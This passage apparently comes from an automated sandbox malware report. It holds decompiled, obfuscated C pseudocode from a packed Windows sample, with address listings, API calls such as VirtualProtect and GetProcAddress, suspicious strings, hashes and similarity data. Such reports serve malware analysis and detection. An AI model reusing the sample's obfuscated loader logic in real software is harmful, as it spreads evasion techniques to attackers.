					L6:
					_t58 =  *0x50bf13; // -9
					_t120 =  !(_t120 - 1);
					goto L7;
				} else {
					_t58 =  *(_t122 - 0xc);
					_t104 = 0x679c;
					 *0x509182 = 0x679c;
					_t111 = _t111 - 0x804883;
					if((_t111 & 0x000096eb) < 0) {
						L7:
						 *0x50bf14 = _t58;
						_t60 = VirtualProtect(??, ??, ??, ??);
						 *0x50bf11 =  *0x50bf11 - _t111;
						if((_t111 & 0x0000009a) != 0) {
							L12:
							 *((intOrPtr*)(_t122 - 0x18)) = 0x3b71ab;
							_t88 = 0;
							_t104 = _t104 - 0x57bab4 + 0x69b3;
							 *0x509186 = _t104;
							L13:
							asm("sbb eax, eax");
							_t89 = _t88 - 0xb5;
							 *(_t122 - 8) = _t60;
							_t61 = "api-ms-win-core-namedpipe-l1-1-0.dll";
							if(_t61 != 0x2cb7) {
								L19:
								L20:
								 *0x50bf15 = _t61;
								_t61 =  *0x50bf17; // -1
								L21:
								 *0x50bf07 =  *0x50bf07 - _t61;
								 *0x509030 =  *0x509030 + _t61;
								_t66 =  *(_t122 - 8) + 1;
								 *(_t122 - 8) = _t66;
								 *0x509754 = _t66;
								_t69 =  *(_t122 - 8);
								 *0x50bf0b =  *0x50bf0b + 0xffffffffffce037e;
								 *(_t122 - 0xbd) = _t69;
								 *(_t122 - 8) = _t69;
								_push(E004F4CE3);
								goto __eax;
							}
							if(_t89 >= 0x2f2ce5) {
								L17:
								 *0x50ad38 =  *0x50ad38 - _t120;
								if((_t120 & 0x0000baa2) <= 0) {
									goto L21;
								}
								_t61 = 0xce;
								goto L19;
							}
							if(_t104 < _t104) {
								goto L20;
							}
							 *0x5091aa = _t111;
							_t111 = 0x8b1a42;
							goto L17;
						}
						_t111 = 0xa7bb;
						if((_t120 & 0x009d816b) == 0) {
							 *0x50bf13 = _t60;
						}
						_t88 = 0xdb;
						if(_t117 < 0) {
							goto L13;
						} else {
							_t88 = _t60;
							_t117 = 0x50900a;
							if(_t60 < 0x11041d) {
								goto L13;
							}
							goto L12;
						}
					}
					goto L6;
				}
			}























                      0x004f4a5a
                      0x004f4a66
                      0x004f4a6a
                      0x004f4a70
                      0x004f4a72
                      0x004f4a7d
                      0x004f4a80
                      0x004f4a86
                      0x004f4a88
                      0x004f4a90
                      0x004f4a96
                      0x004f4a9b
                      0x004f4aab
                      0x004f4ab2
                      0x004f4ab4
                      0x004f4ac0
                      0x004f4ac2
                      0x004f4ac2
                      0x004f4ac9
                      0x004f4ad6
                      0x004f4ad8
                      0x004f4ad8
                      0x004f4ade
                      0x004f4ae5
                      0x004f4aeb
                      0x004f4aff
                      0x004f4b02
                      0x004f4b08
                      0x004f4b0d
                      0x004f4b2f
                      0x004f4b38
                      0x004f4b43
                      0x004f4b52
                      0x004f4b55
                      0x004f4b62
                      0x004f4b68
                      0x004f4b6e
                      0x004f4b75
                      0x004f4ba5
                      0x004f4ba5
                      0x004f4bac
                      0x00000000
                      0x004f4b77
                      0x004f4b77
                      0x004f4b87
                      0x004f4b8b
                      0x004f4b95
                      0x004f4ba0
                      0x004f4bae
                      0x004f4bae
                      0x004f4bb6
                      0x004f4bbc
                      0x004f4bc5
                      0x004f4bf1
                      0x004f4c00
                      0x004f4c03
                      0x004f4c0b
                      0x004f4c10
                      0x004f4c1a
                      0x004f4c1d
                      0x004f4c1f
                      0x004f4c22
                      0x004f4c25
                      0x004f4c2e
                      0x004f4c71
                      0x004f4c73
                      0x004f4c73
                      0x004f4c7a
                      0x004f4c80
                      0x004f4c80
                      0x004f4c86
                      0x004f4ca0
                      0x004f4ca3
                      0x004f4ca6
                      0x004f4cb7
                      0x004f4cba
                      0x004f4cc0
                      0x004f4cd2
                      0x004f4cd7
                      0x004f4ce1
                      0x004f4ce1
                      0x004f4c36
                      0x004f4c60
                      0x004f4c62
                      0x004f4c6d
                      0x00000000
                      0x00000000
                      0x004f4c6f
                      0x00000000
                      0x004f4c6f
                      0x004f4c44
                      0x00000000
                      0x00000000
                      0x004f4c51
                      0x004f4c5a
                      0x00000000
                      0x004f4c5a
                      0x004f4bc7
                      0x004f4bd1
                      0x004f4bd3
                      0x004f4bd3
                      0x004f4bdb
                      0x004f4be0
                      0x00000000
                      0x004f4be2
                      0x004f4be2
                      0x004f4be4
                      0x004f4bef
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004f4bef
                      0x004f4be0
                      0x00000000
                      0x004f4ba0

                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 004F4BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: IMCCPHR.exe$NtSetDriverEntryOrder$WFServicesReg.exe$WSManHTTPConfig.exe$_isdel.exe$`gqt$api-ms-win-core-namedpipe-l1-1-0.dll$dpnet.dll$iQ=$,/
                      • API String ID: 544645111-3502657855
                      • Opcode ID: ec27e29c56b2707b875f98129341c3db7f53dafc9c418b66351b097dc422d39e
                      • Instruction ID: 167a9ad0ed12714ebbcbffc6452b1b06da35b8c99c2e9e3ff36a11cf9dfecc59
                      • Opcode Fuzzy Hash: ec27e29c56b2707b875f98129341c3db7f53dafc9c418b66351b097dc422d39e
                      • Instruction Fuzzy Hash: 0651CC75A1434A9FDB00DFB9DD882DE7FB0EBB9300F04446A9A40DB36AD3744A48DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048690B Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 146libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 16%
                      			E0048690B(intOrPtr __eax, void* __ebx, short __edx, signed short __esi) {
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t37;
				char _t40;
				intOrPtr _t46;
				char* _t52;
				short _t86;
				short _t88;
				intOrPtr _t92;
				short _t93;
				signed short _t96;
				void* _t98;
				signed short _t104;
				void* _t105;

				_t104 = __esi;
				_t93 = __edx;
				_t52 = 0x3039fe;
				 *((intOrPtr*)(_t105 - 0x58)) = __eax;
				 *((intOrPtr*)(_t105 - 0x10)) = __eax;
				if(0x3039fe >= 0x37) {
					_t52 = 0xffffffffffb99f5c;
				}
				_t30 =  *((intOrPtr*)(_t105 - 0x10));
				_push( *((intOrPtr*)(_t105 - 0x58)));
				_t86 =  *0x50914e; // 0xef9e
				 *0x50919c = _t93;
				_t96 = 0x9e5c;
				 *((intOrPtr*)(_t105 - 8)) = _t30;
				if(_t30 + _t30 <= 0x2923) {
					_t52 = "mscpxl32.dLL";
				}
				 *(_t105 - 0x18) = _t52;
				_t32 =  *((intOrPtr*)(_t105 - 8));
				 *0x509152 = _t86;
				_push( *0x509598);
				 *((intOrPtr*)(_t105 - 0x20)) = _t86;
				_t88 = 0x7124;
				 *((intOrPtr*)(_t105 - 8)) = _t32;
				_push(_t32);
				_push(_t32);
				_push(1);
				if(E004673BF(0x4f52a5) < 0x26c4d6 || 0x4f52a5 < 0x3c) {
					_t88 = _t88 + 0x64;
					 *((intOrPtr*)(_t105 - 0x24)) =  *((intOrPtr*)(_t105 - 0x24)) + _t88;
					 *0x509172 = _t88;
				}
				 *((intOrPtr*)(_t105 - 8)) = GetProcAddress();
				_t37 = 0;
				if("IMCCPHR.exe" == "IMCCPHR.exe") {
					_t92 =  *0x50912e; // 0x9c03
					 *0x509160 =  *0x509160 - _t92;
					 *0x509178 =  *0x509178 + _t92;
					_t88 = _t92 + _t92;
					if((_t96 & 0x00008bee) >= 0) {
						 *0x509212 = _t96;
					}
					_t37 = 0xc6;
					 *0x509356 =  *0x509356 + _t104;
				}
				 *0x509458 = _t37;
				_t40 =  *((intOrPtr*)(_t105 - 8));
				 *0x5097e4 = _t40;
				 *0x50bf15 = _t40;
				if(_t40 >= 0x818e6) {
					 *0x50bf0b =  *0x50bf0b + 0x2461ef;
					if(0x2461ef < 0x2461ef) {
						L14:
						_t104 = _t104;
					} else {
						 *0x509152 = _t88;
						 *0x50916a = _t88;
						_t98 = _t96 - 0x872d;
						 *0x5091ce =  *0x5091ce + _t98;
						 *0x50a948 =  *0x50a948 + _t98;
						_t96 = _t98 + _t98;
						if((_t104 & 0x0000ae9a) > 0) {
							goto L14;
						}
					}
				}
				_push(0);
				 *((intOrPtr*)(_t105 - 8)) = _t40;
				 *(_t105 - 0x14) = "RtlReleaseRelativeName";
				L00468D9F(0x437a95, _t96, 0, _t104, 0x437a95, 1);
				 *(_t105 - 0x1c) = "RegDeleteKeyExW";
				_t46 =  *((intOrPtr*)(_t105 - 8));
				 *0x509190 = 0x63ef;
				 *((intOrPtr*)(_t105 - 8)) = _t46;
				_push(1);
				_push(E00486B21);
				_push(L00469469);
				return _t46 + _t46;
			}

















                      0x0048690b
                      0x0048690b
                      0x00486914
                      0x00486919
                      0x0048691c
                      0x00486922
                      0x00486926
                      0x0048692c
                      0x00486939
                      0x0048693c
                      0x00486941
                      0x00486948
                      0x00486956
                      0x0048695a
                      0x00486964
                      0x00486966
                      0x00486966
                      0x0048696b
                      0x00486975
                      0x00486978
                      0x0048697f
                      0x00486985
                      0x0048698b
                      0x0048698f
                      0x00486992
                      0x00486993
                      0x00486994
                      0x004869a0
                      0x004869ac
                      0x004869af
                      0x004869b2
                      0x004869b2
                      0x004869c7
                      0x004869cf
                      0x004869d9
                      0x004869dd
                      0x004869e4
                      0x004869eb
                      0x004869f2
                      0x004869fc
                      0x004869fe
                      0x004869fe
                      0x00486a0d
                      0x00486a0f
                      0x00486a1b
                      0x00486a20
                      0x00486a2e
                      0x00486a31
                      0x00486a3b
                      0x00486a4f
                      0x00486a5c
                      0x00486a64
                      0x00486a99
                      0x00486a99
                      0x00486a68
                      0x00486a69
                      0x00486a70
                      0x00486a7e
                      0x00486a83
                      0x00486a8a
                      0x00486a90
                      0x00486a97
                      0x00000000
                      0x00000000
                      0x00486a97
                      0x00486a9d
                      0x00486ab1
                      0x00486ac2
                      0x00486ad2
                      0x00486aec
                      0x00486af6
                      0x00486b03
                      0x00486b06
                      0x00486b0f
                      0x00486b14
                      0x00486b16
                      0x00486b1b
                      0x00486b20

                      APIs
                      • GetProcAddress.KERNEL32(00000001,?), ref: 004869BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$IMCCPHR.exe$MapUserPhysicalPages$RegDeleteKeyExW$RtlReleaseRelativeName$VarI4FromCy$dpnet.dll$mscpxl32.dLL$wuapi.dll$a$
                      • API String ID: 190572456-4294821618
                      • Opcode ID: aefbc923d6e6338b3ae015476f66a4f4e976e45252f4cf5243c5126883dc0636
                      • Instruction ID: 44d64a0c3b338a602ad08b57d9b739b0c1e744ab6c8771b5a3ccb3cfc0cd2ea3
                      • Opcode Fuzzy Hash: aefbc923d6e6338b3ae015476f66a4f4e976e45252f4cf5243c5126883dc0636
                      • Instruction Fuzzy Hash: 265104B4B543069FCB00AFB9E8956CD7BB0FB39310F044829D944E7366E3780949DB05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0049C9B8 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 221libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 27%
                      			E0049C9B8(unsigned int __ebx, signed int __ecx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _t36;
				signed int _t39;
				signed int _t47;
				signed int _t49;
				char* _t50;
				char* _t54;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr _t61;
				unsigned short _t66;
				void* _t71;
				signed char _t90;
				signed int _t94;
				short _t102;
				intOrPtr _t114;
				void* _t115;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t124;

				_t119 = __esi;
				_t115 = __edi;
				_t90 =  !__ecx;
				_t66 = __ebx >> _t90;
				if(_t66 != 0x3a) {
					if(_t66 > _t66) {
						_t66 = _t66 + 0x5143;
					}
					 *0x509154 = _t90;
					_t90 = 0x8091;
				}
				 *0x5091f0 = 0x9056;
				_t36 = GetProcAddress(??, ??);
				_t108 = 0xa126;
				 *(_t124 - 8) = _t36;
				if(_t36 >= 0x14) {
					 *((intOrPtr*)(_t124 - 0x14)) =  *((intOrPtr*)(_t124 - 0x14)) + 0x2e7871;
					_t66 =  *(_t124 - 0x1c);
					_t102 = _t90 - 0x5b3c;
					 *0x50915c = _t102;
					_t90 = _t102 + _t102;
					if(0x8020 != 0) {
						_t108 = 0xb36f;
						 *0x50a9c0 =  *0x50a9c0 + 0xb36f;
					}
					_t36 = 0xbd;
				}
				 *0x509338 =  *0x509338 - _t119;
				_t120 = _t119 - _t115;
				_t116 = _t115 + 0xd11c64;
				 *0x50bf17 =  *0x50bf17 - _t36 + _t36;
				 *0x50b93d =  *0x50b93d + _t116;
				_t39 =  *(_t124 - 8);
				 *0x50a1fc = _t39;
				 *(_t124 - 8) = _t39;
				L00469469(_t66, _t116, _t120, _t66);
				if(_t66 <= _t66) {
					L11:
					 *0x50962a =  *0x50962a + _t116;
					 *0x50bf17 =  *0x50bf17 - 0xe0;
					_t116 = 0;
				} else {
					if(_t90 != _t90) {
						 *0x50914a = _t90;
						_t90 =  *0x50917e; // 0xe31a
						 *0x5091cc = _t108 - 0x85ca;
						_t114 =  *0x509218; // 0xa1e2
						_t108 = _t114 + 1;
						_t120 = _t120 | 0x00a97e74;
						goto L11;
					}
				}
				_t94 =  !0x6f2f;
				 *0x50919c = _t108;
				_t47 =  *(_t124 - 8);
				_push(0);
				_t117 = _t116 - _t47;
				 *(_t124 - 0xc) = _t47;
				_t71 = 0x3b29ee;
				_t49 =  *(_t124 - 0xc);
				 *(_t124 - 0x1c) = 0x10bc61;
				if(0x6f2f < 0x6f2f) {
					_t94 = 0x7146;
					 *0x50a628 =  *0x50a628 + 0x7146;
					_t108 = _t108 - 0xa3;
					 *0x509224 =  *0x509224 + _t120;
					_t120 = _t120 + _t120 - 0xb36054;
					 *0x50bb33 =  *0x50bb33 + _t117;
					 *0x509026 =  *0x509026 - _t49;
					 *0x50bf09 =  *0x50bf09 - _t49;
					_t71 = 0x26e306;
				}
				 *0x50bf0b =  *0x50bf0b - _t71;
				 *(_t124 - 8) = _t49;
				_t50 =  *0x5096d8; // 0x3873f71
				if(_t50 != 0x25) {
					if(_t71 < 0x35) {
						L18:
						_t94 = _t94 + 0x7b3f;
						 *0x5091c2 = _t108;
						_t108 =  *0x5091f8; // 0x0
					} else {
						_t71 = 0x441bee;
						if(_t94 != _t94) {
							 *0x50912c = _t94;
							_t94 = 0;
							goto L18;
						}
					}
				}
				 *0x50bf13 = _t50;
				_push( *0x509006);
				_t54 = "api-ms-win-core-namedpipe-l1-1-0.dll";
				if(_t71 < 0x2e7e) {
					L25:
					 *0x50bf11 =  *0x50bf11 + _t108 + 0x98;
					_t121 = 0;
				} else {
					_t71 = _t71 + 0x4e07;
					 *0x50bf0c =  *0x50bf0c + _t94;
					if(_t94 >= _t94) {
						L23:
						 *0x509100 =  *0x509100 + _t71;
						goto L24;
					} else {
						_t94 =  *0x50917c; // 0xcbc1
						 *0x5091ca = _t108;
						 *0x5091e0 = _t108;
						_t108 = _t108 - 0xa7;
						_t120 = 0xb487;
						 *0x50bf13 = _t54;
						if(_t54 < 0) {
							L24:
							 *((intOrPtr*)(_t124 - 0x28)) =  *((intOrPtr*)(_t124 - 0x28)) - 0x66ba;
							_t94 = 0x66ba - _t108;
							_t108 = 0;
							goto L25;
						} else {
							_t117 = _t117 + 1;
							 *0x50bf17 = _t54;
							_t61 =  *0x509484; // 0x0
							 *(_t124 - 0xc) = _t61 - 0x17e2;
							_t71 = _t71 - 1;
							if(_t71 == _t71) {
								goto L23;
							}
						}
					}
				}
				 *0x50b88d =  *0x50b88d + _t121;
				 *0x50bf15 = 0xc9;
				_t56 =  *(_t124 - 8);
				_push( *0x5090b6);
				 *0x50962e =  *0x50962e + _t117;
				 *0x509648 =  *0x509648 + _t117;
				if(_t56 < 0x251) {
					 *(_t124 - 0x10) = _t56;
					 *0x509106 =  *0x509106 + 0x3aa6c6;
					 *0x50bf12 = _t56;
					_t121 = _t121 - _t121;
				}
				 *0x50bf15 = _t56;
				if(_t56 == 0) {
					 *0x5094f8 =  *0x5094f8 - _t56;
					 *(_t124 - 8) = _t56;
				}
				 *(_t124 - 8) = _t56;
				_t58 =  *(_t124 - 8);
				 *(_t124 - 0x10) = _t58;
				 *(_t124 - 8) = _t58;
				_t59 =  !_t58;
				_push(_t59);
				_push(_t59);
				_push(E0049CD1D);
				_push(L00468D9F);
				return _t59;
			}


























                      0x0049c9b8
                      0x0049c9b8
                      0x0049c9b8
                      0x0049c9cb
                      0x0049c9e0
                      0x0049c9e5
                      0x0049c9e7
                      0x0049c9e7
                      0x0049c9ec
                      0x0049c9fa
                      0x0049c9fa
                      0x0049ca02
                      0x0049ca0c
                      0x0049ca12
                      0x0049ca16
                      0x0049ca1b
                      0x0049ca25
                      0x0049ca2a
                      0x0049ca2d
                      0x0049ca32
                      0x0049ca39
                      0x0049ca43
                      0x0049ca45
                      0x0049ca4b
                      0x0049ca4b
                      0x0049ca53
                      0x0049ca53
                      0x0049ca55
                      0x0049ca5c
                      0x0049ca61
                      0x0049ca67
                      0x0049ca6d
                      0x0049ca7a
                      0x0049ca7d
                      0x0049ca82
                      0x0049ca8d
                      0x0049ca95
                      0x0049cad0
                      0x0049cad8
                      0x0049cadf
                      0x0049cae5
                      0x0049ca97
                      0x0049caa1
                      0x0049caa3
                      0x0049caaa
                      0x0049cab6
                      0x0049cac0
                      0x0049cac7
                      0x0049cac8
                      0x00000000
                      0x0049cac8
                      0x0049caa1
                      0x0049cb0a
                      0x0049cb0c
                      0x0049cb13
                      0x0049cb16
                      0x0049cb18
                      0x0049cb1f
                      0x0049cb28
                      0x0049cb2e
                      0x0049cb31
                      0x0049cb37
                      0x0049cb40
                      0x0049cb44
                      0x0049cb50
                      0x0049cb53
                      0x0049cb5c
                      0x0049cb64
                      0x0049cb74
                      0x0049cb7b
                      0x0049cb83
                      0x0049cb83
                      0x0049cb88
                      0x0049cb8e
                      0x0049cb91
                      0x0049cb98
                      0x0049cb9d
                      0x0049cbb4
                      0x0049cbb4
                      0x0049cbb9
                      0x0049cbc0
                      0x0049cb9f
                      0x0049cba1
                      0x0049cba8
                      0x0049cbaa
                      0x0049cbb1
                      0x00000000
                      0x0049cbb1
                      0x0049cba8
                      0x0049cb9d
                      0x0049cbc7
                      0x0049cbd6
                      0x0049cbe2
                      0x0049cbec
                      0x0049cc5f
                      0x0049cc62
                      0x0049cc6a
                      0x0049cbf0
                      0x0049cbf0
                      0x0049cbf5
                      0x0049cbfd
                      0x0049cc45
                      0x0049cc45
                      0x00000000
                      0x0049cbff
                      0x0049cc02
                      0x0049cc09
                      0x0049cc10
                      0x0049cc17
                      0x0049cc1a
                      0x0049cc1e
                      0x0049cc26
                      0x0049cc53
                      0x0049cc57
                      0x0049cc5a
                      0x0049cc5c
                      0x00000000
                      0x0049cc2a
                      0x0049cc2a
                      0x0049cc2b
                      0x0049cc32
                      0x0049cc3b
                      0x0049cc40
                      0x0049cc43
                      0x00000000
                      0x00000000
                      0x0049cc43
                      0x0049cc26
                      0x0049cbfd
                      0x0049cc6e
                      0x0049cc74
                      0x0049cc79
                      0x0049cc7c
                      0x0049cc83
                      0x0049cc8a
                      0x0049cc95
                      0x0049cc9f
                      0x0049ccaa
                      0x0049cccb
                      0x0049ccd1
                      0x0049ccd4
                      0x0049ccdc
                      0x0049cce3
                      0x0049ccea
                      0x0049ccf0
                      0x0049ccf3
                      0x0049ccfd
                      0x0049cd05
                      0x0049cd08
                      0x0049cd0b
                      0x0049cd0e
                      0x0049cd10
                      0x0049cd11
                      0x0049cd12
                      0x0049cd17
                      0x0049cd1c

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: r-$:$CoLockObjectExternal$aaclient.dll$api-ms-win-core-namedpipe-l1-1-0.dll$normaliz.dll$qx.$72$`}
                      • API String ID: 190572456-1770186502
                      • Opcode ID: 96162111387973d314a0a7f3b810252dadc485fe44508a9f7ca6970b16810095
                      • Instruction ID: 6a2317d9f02f9ec2eac30d60caaaaf8f8f985cbb0ed9a221e96869351caf5395
                      • Opcode Fuzzy Hash: 96162111387973d314a0a7f3b810252dadc485fe44508a9f7ca6970b16810095
                      • Instruction Fuzzy Hash: 6881F175A443478BDB00DF78ECD82CD7BB1FB39320B44856AC854A3366E3790949EB99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004CD4F2 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 215registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 39%
                      			E004CD4F2(long __eax, signed int __ebx, signed int __edx, signed int __edi, unsigned short __esi) {
				long _t37;
				long _t40;
				long _t45;
				long _t48;
				long _t49;
				long _t50;
				long _t54;
				char _t57;
				long _t61;
				long _t63;
				long _t65;
				signed int _t69;
				void* _t80;
				signed int _t82;
				signed char _t114;
				signed int _t122;
				intOrPtr _t126;
				short _t136;
				short _t137;
				signed int _t146;
				signed int _t147;
				unsigned short _t150;
				signed int _t151;
				void* _t152;

				_t150 = __esi;
				_t146 = __edi;
				_t134 = __edx;
				_t69 = __ebx;
				_t37 = __eax;
				if(__ebx <= 0x2de970) {
					L3:
					_t134 = _t134 - 0x90e863;
					_t150 = _t150 >> _t114;
					 *0x50bf13 = _t37;
				} else {
					_t69 = "HMETAFILEPICT_UserSize";
					_t114 = 0x7a26;
					if((__edx & 0x00008209) == 0) {
						_t134 = __edx;
						goto L3;
					}
				}
				_t40 = GetLastError();
				_t136 = _t134 - 0x9d;
				 *(_t152 - 8) = _t40;
				 *((intOrPtr*)(_t152 - 0x10)) = _t69;
				_t45 =  *(_t152 - 8);
				if(0 < _t114) {
					if(_t114 < _t114) {
						_t114 = _t114 + 0x6238dd;
					}
					_t114 = _t114 - _t136;
					_t136 = 0x9cd2;
				}
				_t137 = _t136;
				_t151 = _t150 + 1;
				 *(_t152 - 0x4c) = _t45;
				_push( *((intOrPtr*)(_t152 - 0x54)));
				_t80 = _t45 + 2;
				 *(_t152 - 8) = _t45;
				if(_t45 >= 0x19ec) {
					L13:
					_t82 = _t80 + _t80 + 0x4b;
				} else {
					_t45 = 0x50bf0a;
					 *((intOrPtr*)(_t152 - 0x14)) = 0x3388ab;
					_t82 = 0;
					_t114 = _t114 + 0x62;
					 *0x50916e = _t114;
					if(_t114 != _t114) {
						_t137 =  *0x5091b6; // 0xc472
						 *0x509208 = _t137;
						_t63 =  *0x50bf13; // -9
						 *0x50bf14 = _t63 - 0xc3;
						_t65 =  *0x50bf15; // 0x0
						if(_t65 <= 0) {
							 *0x5093d0 =  *0x5093d0 - 0xfb;
						}
						_t45 = "_isdel.exe";
						goto L13;
					}
				}
				 *0x5091d6 = _t137;
				_t139 = 0xffffffffff6887d7;
				 *0x50bf13 = _t45;
				_t147 = _t146 | _t146;
				_t48 = RegCloseKey(??);
				 *(_t152 - 8) = _t48;
				_t49 = _t48 - 0x1d0e;
				_push(0);
				L004C2E39();
				 *((intOrPtr*)(_t152 - 0x10)) =  *((intOrPtr*)(_t152 - 0x10)) +  !_t82;
				 *0x509144 =  *0x509144 - 0x52a151;
				if(0x8350 < 0) {
					 *0x5091dc =  *0x5091dc + 0xffffffffff6887d7;
					_t139 = 0x995d6c;
					_t151 =  !_t151;
					 *0x50bf13 = _t49;
					_t61 =  *0x50bf14; // 0x0
					 *0x50bf17 = _t61;
					_t147 = 0;
					if(_t61 != 0xe54) {
						_t61 = 0x1aff1e;
					}
					 *0x509112 = 0x7bab;
				}
				_t122 = 0xe903;
				_t50 =  *(_t152 - 8);
				if( *((intOrPtr*)(_t152 - 0x58)) == 0) {
					if(_t147 > 0) {
						L22:
						 *0x5091b2 = _t139;
						_t139 = 0;
					} else {
						 *0x50bf17 = _t50;
						 *0x50907e =  *0x50907e - _t50;
						if( *(_t152 - 8) - 0x20 + _t50 <  *(_t152 - 8) - 0x20 + _t50) {
							goto L22;
						}
					}
					 *0x50bf15 = _t50;
					 *0x509038 =  *0x509038 - _t50;
					if(_t50 == 0x2bf340) {
					}
					 *0x50916c = 0x604f;
					_t122 = 0xc09e;
					 *((intOrPtr*)(_t152 - 0x5c)) = 1;
				}
				 *0x50bf15 =  *0x50bf15 + _t50;
				 *0x50bf17 = _t50;
				 *(_t152 - 8) = _t50;
				 *((intOrPtr*)(_t152 - 0x14)) = 0xffffffffffd59272;
				_t54 =  *(_t152 - 8);
				if(("System.Xml.XmlDocument.dll" & 0x0000003d) > ("System.Xml.XmlDocument.dll" & 0x0000003d)) {
					_t122 = _t122 | 0x00000065;
				}
				_t140 = 0x8ade;
				 *0x5091da =  *0x5091da + 0x8ade;
				 *(_t152 - 8) = _t54;
				if(0x44e984 >= 0x44e984) {
					_t126 =  *0x509144; // 0x5f92
					 *0x509192 =  *0x509192 + _t126 - 0x7442;
					_t140 = 0x115bc;
				}
				_t57 = E004B2347(0x44e984, _t151);
				 *0x509212 =  *0x509212 + _t140;
				 *0x50bf12 = _t57;
				return  *((intOrPtr*)(_t152 - 0x5c));
			}



























                      0x004cd4f2
                      0x004cd4f2
                      0x004cd4f2
                      0x004cd4f2
                      0x004cd4f2
                      0x004cd4f8
                      0x004cd519
                      0x004cd51f
                      0x004cd522
                      0x004cd525
                      0x004cd4fa
                      0x004cd502
                      0x004cd50c
                      0x004cd515
                      0x004cd517
                      0x00000000
                      0x004cd517
                      0x004cd515
                      0x004cd534
                      0x004cd539
                      0x004cd53c
                      0x004cd547
                      0x004cd561
                      0x004cd569
                      0x004cd56d
                      0x004cd575
                      0x004cd575
                      0x004cd577
                      0x004cd57d
                      0x004cd57d
                      0x004cd581
                      0x004cd58d
                      0x004cd58e
                      0x004cd594
                      0x004cd599
                      0x004cd59c
                      0x004cd5a3
                      0x004cd605
                      0x004cd608
                      0x004cd5a5
                      0x004cd5a5
                      0x004cd5b0
                      0x004cd5b5
                      0x004cd5b7
                      0x004cd5ba
                      0x004cd5c3
                      0x004cd5c5
                      0x004cd5cc
                      0x004cd5d5
                      0x004cd5de
                      0x004cd5e4
                      0x004cd5ec
                      0x004cd5f0
                      0x004cd5f6
                      0x004cd600
                      0x00000000
                      0x004cd600
                      0x004cd5c3
                      0x004cd619
                      0x004cd623
                      0x004cd629
                      0x004cd637
                      0x004cd63c
                      0x004cd642
                      0x004cd645
                      0x004cd649
                      0x004cd64b
                      0x004cd650
                      0x004cd65d
                      0x004cd672
                      0x004cd674
                      0x004cd681
                      0x004cd687
                      0x004cd689
                      0x004cd691
                      0x004cd69c
                      0x004cd6a1
                      0x004cd6a8
                      0x004cd6aa
                      0x004cd6aa
                      0x004cd6be
                      0x004cd6be
                      0x004cd6c8
                      0x004cd6cd
                      0x004cd6d4
                      0x004cd6dc
                      0x004cd700
                      0x004cd70c
                      0x004cd713
                      0x004cd6de
                      0x004cd6de
                      0x004cd6eb
                      0x004cd6f9
                      0x00000000
                      0x004cd6fb
                      0x004cd6f9
                      0x004cd72b
                      0x004cd73a
                      0x004cd74a
                      0x004cd74a
                      0x004cd757
                      0x004cd75e
                      0x004cd766
                      0x004cd766
                      0x004cd76d
                      0x004cd773
                      0x004cd77f
                      0x004cd790
                      0x004cd79a
                      0x004cd7a9
                      0x004cd7ab
                      0x004cd7ab
                      0x004cd7ba
                      0x004cd7be
                      0x004cd7c5
                      0x004cd7d9
                      0x004cd7de
                      0x004cd7ea
                      0x004cd7f4
                      0x004cd7f4
                      0x004cd7f6
                      0x004cd7fb
                      0x004cd804
                      0x004cd817

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CloseErrorLast
                      • String ID: 'H7$HMETAFILEPICT_UserSize$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$_isdel.exe$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$p-
                      • API String ID: 3262646002-4178774678
                      • Opcode ID: 9f0f2fe4ae085fac61872d3ee6458d6092fc228ccc3b35d02eeac36c66c0a2af
                      • Instruction ID: ed737d422411b0dff1ade46d864745515fd27362d8ba302c07b36030a5b9558c
                      • Opcode Fuzzy Hash: 9f0f2fe4ae085fac61872d3ee6458d6092fc228ccc3b35d02eeac36c66c0a2af
                      • Instruction Fuzzy Hash: 1F81EE69F142468FDB00AFB8EDD87DD3BB0EB7A314F08487E885597366E278054ADB11
                      Uniqueness

                      Uniqueness Score: -1.00%

